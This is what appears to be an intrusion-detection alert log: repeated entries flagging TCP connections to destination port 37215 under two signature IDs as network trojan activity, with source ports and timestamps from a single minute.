          SID:2829579
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160469
          SID:2835222
          Source Port:58110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513028
          SID:2835222
          Source Port:59408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159966
          SID:2829579
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005699
          SID:2835222
          Source Port:44274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466271
          SID:2829579
          Source Port:51220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356838
          SID:2835222
          Source Port:42700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378414
          SID:2829579
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804161
          SID:2835222
          Source Port:45226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837493
          SID:2829579
          Source Port:34898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729862
          SID:2835222
          Source Port:44858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108233
          SID:2835222
          Source Port:33192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239889
          SID:2835222
          Source Port:37126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161321
          SID:2829579
          Source Port:47410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159880
          SID:2835222
          Source Port:54864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884129
          SID:2829579
          Source Port:45090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351490
          SID:2835222
          Source Port:59028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351646
          SID:2829579
          Source Port:36628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601626
          SID:2829579
          Source Port:49806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508965
          SID:2829579
          Source Port:38660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551768
          SID:2835222
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787926
          SID:2835222
          Source Port:43434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174978
          SID:2835222
          Source Port:43382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784098
          SID:2835222
          Source Port:37180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355044
          SID:2829579
          Source Port:43950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306243
          SID:2829579
          Source Port:35796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276108
          SID:2829579
          Source Port:54758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815621
          SID:2835222
          Source Port:53568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729423
          SID:2829579
          Source Port:51860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108547
          SID:2829579
          Source Port:33134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394615
          SID:2835222
          Source Port:58342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179942
          SID:2829579
          Source Port:45332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739956
          SID:2835222
          Source Port:41090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895919
          SID:2835222
          Source Port:34170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704728
          SID:2835222
          Source Port:59758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854938
          SID:2835222
          Source Port:42264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153691
          SID:2835222
          Source Port:36570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273174
          SID:2829579
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742572
          SID:2835222
          Source Port:48536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663605
          SID:2835222
          Source Port:38582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019572
          SID:2835222
          Source Port:44848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408793
          SID:2829579
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817502
          SID:2835222
          Source Port:56454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780896
          SID:2829579
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599053
          SID:2829579
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901769
          SID:2835222
          Source Port:56960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444945
          SID:2829579
          Source Port:50164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058283
          SID:2829579
          Source Port:60278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175643
          SID:2835222
          Source Port:47534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241117
          SID:2829579
          Source Port:47944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461253
          SID:2829579
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705346
          SID:2829579
          Source Port:38152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405238
          SID:2829579
          Source Port:45290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444716
          SID:2835222
          Source Port:47602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448458
          SID:2835222
          Source Port:39826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260072
          SID:2829579
          Source Port:45650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542784
          SID:2829579
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514386
          SID:2835222
          Source Port:47842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241044
          SID:2835222
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708026
          SID:2835222
          Source Port:49876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191591
          SID:2835222
          Source Port:33976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351756
          SID:2835222
          Source Port:55344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353674
          SID:2835222
          Source Port:41002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801019
          SID:2829579
          Source Port:38212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663754
          SID:2829579
          Source Port:46460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269259
          SID:2829579
          Source Port:46302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819129
          SID:2829579
          Source Port:51160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410983
          SID:2835222
          Source Port:47214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018562
          SID:2829579
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857054
          SID:2829579
          Source Port:38314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129265
          SID:2835222
          Source Port:41278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175783
          SID:2829579
          Source Port:38030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465663
          SID:2829579
          Source Port:48150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552285
          SID:2829579
          Source Port:38166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176347
          SID:2829579
          Source Port:42460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896541
          SID:2835222
          Source Port:52212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511029
          SID:2829579
          Source Port:33742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378192
          SID:2835222
          Source Port:43222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746010
          SID:2835222
          Source Port:53740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545794
          SID:2835222
          Source Port:35070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178911
          SID:2835222
          Source Port:48914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731115
          SID:2829579
          Source Port:60372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403904
          SID:2835222
          Source Port:56846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496027
          SID:2835222
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061923
          SID:2835222
          Source Port:48070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233619
          SID:2829579
          Source Port:51686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706698
          SID:2835222
          Source Port:48174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792004
          SID:2829579
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176989
          SID:2835222
          Source Port:60266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267728
          SID:2829579
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442294
          SID:2829579
          Source Port:37700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835605
          SID:2829579
          Source Port:45546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810986
          SID:2835222
          Source Port:45738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542824
          SID:2835222
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741966
          SID:2829579
          Source Port:55402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135506
          SID:2835222
          Source Port:49196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896745
          SID:2829579
          Source Port:53986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466578
          SID:2829579
          Source Port:54672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675101
          SID:2835222
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857896
          SID:2835222
          Source Port:40054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037168
          SID:2835222
          Source Port:51478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044083
          SID:2835222
          Source Port:59362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549288
          SID:2829579
          Source Port:40852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781617
          SID:2835222
          Source Port:41998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783197
          SID:2829579
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107933
          SID:2835222
          Source Port:41108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516375
          SID:2835222
          Source Port:37210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057856
          SID:2835222
          Source Port:49616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606106
          SID:2829579
          Source Port:58850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241613
          SID:2835222
          Source Port:56538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262702
          SID:2835222
          Source Port:34062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512154
          SID:2835222
          Source Port:41754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044710
          SID:2835222
          Source Port:55958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743020
          SID:2835222
          Source Port:39834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173925
          SID:2835222
          Source Port:43180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162850
          SID:2835222
          Source Port:55662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175962
          SID:2835222
          Source Port:48844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829616
          SID:2829579
          Source Port:52270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113837
          SID:2835222
          Source Port:55740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551616
          SID:2835222
          Source Port:53382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834330
          SID:2829579
          Source Port:51814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354587
          SID:2829579
          Source Port:59020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294802
          SID:2835222
          Source Port:49520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041235
          SID:2829579
          Source Port:47772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600145
          SID:2835222
          Source Port:51594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857410
          SID:2829579
          Source Port:53550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162609
          SID:2835222
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241726
          SID:2829579
          Source Port:38944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157238
          SID:2829579
          Source Port:50000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407688
          SID:2835222
          Source Port:56570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820718
          SID:2829579
          Source Port:50636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894435
          SID:2835222
          Source Port:51538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037029
          SID:2829579
          Source Port:43418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178469
          SID:2829579
          Source Port:40420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158298
          SID:2829579
          Source Port:33252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444874
          SID:2835222
          Source Port:50496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396884
          SID:2835222
          Source Port:35372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748957
          SID:2829579
          Source Port:42106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860418
          SID:2835222
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672586
          SID:2835222
          Source Port:43298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353739
          SID:2829579
          Source Port:33544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005401
          SID:2829579
          Source Port:33258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178566
          SID:2835222
          Source Port:40966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115289
          SID:2829579
          Source Port:55848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898170
          SID:2829579
          Source Port:59454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274843
          SID:2835222
          Source Port:59438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113620
          SID:2835222
          Source Port:57476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.886985
          SID:2835222
          Source Port:39102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107432
          SID:2829579
          Source Port:52374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466165
          SID:2835222
          Source Port:54544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784165
          SID:2835222
          Source Port:55434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600504
          SID:2829579
          Source Port:33988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180423
          SID:2829579
          Source Port:60892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272864
          SID:2835222
          Source Port:59990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107148
          SID:2835222
          Source Port:51668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155836
          SID:2835222
          Source Port:55614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805970
          SID:2835222
          Source Port:37690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743436
          SID:2829579
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841848
          SID:2835222
          Source Port:35450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152954
          SID:2835222
          Source Port:60592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444761
          SID:2829579
          Source Port:42650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733028
          SID:2829579
          Source Port:39682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351387
          SID:2835222
          Source Port:51834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901503
          SID:2829579
          Source Port:46718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888107
          SID:2835222
          Source Port:43778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408737
          SID:2835222
          Source Port:59680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854330
          SID:2835222
          Source Port:37794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707163
          SID:2835222
          Source Port:51204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495952
          SID:2829579
          Source Port:50326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857969
          SID:2835222
          Source Port:55188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.823737
          SID:2829579
          Source Port:53122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786437
          SID:2835222
          Source Port:52380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106323
          SID:2835222
          Source Port:53116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404624
          SID:2835222
          Source Port:33366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306686
          SID:2835222
          Source Port:53156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731245
          SID:2829579
          Source Port:35594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461253
          SID:2835222
          Source Port:56152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396820
          SID:2835222
          Source Port:58374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542657
          SID:2835222
          Source Port:38516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153937
          SID:2829579
          Source Port:60032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892700
          SID:2835222
          Source Port:51488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160711
          SID:2829579
          Source Port:42136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237567
          SID:2829579
          Source Port:36568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113691
          SID:2835222
          Source Port:44896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353049
          SID:2829579
          Source Port:53948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733116
          SID:2835222
          Source Port:51610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303157
          SID:2835222
          Source Port:35692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515939
          SID:2835222
          Source Port:41102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780845
          SID:2829579
          Source Port:57560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036281
          SID:2829579
          Source Port:56450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471374
          SID:2829579
          Source Port:35890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.277172
          SID:2835222
          Source Port:50408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160222
          SID:2835222
          Source Port:50912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732217
          SID:2835222
          Source Port:40668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303222
          SID:2835222
          Source Port:43498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187931
          SID:2829579
          Source Port:44034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849609
          SID:2829579
          Source Port:60348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603059
          SID:2829579
          Source Port:42590
          Destination Port:37215
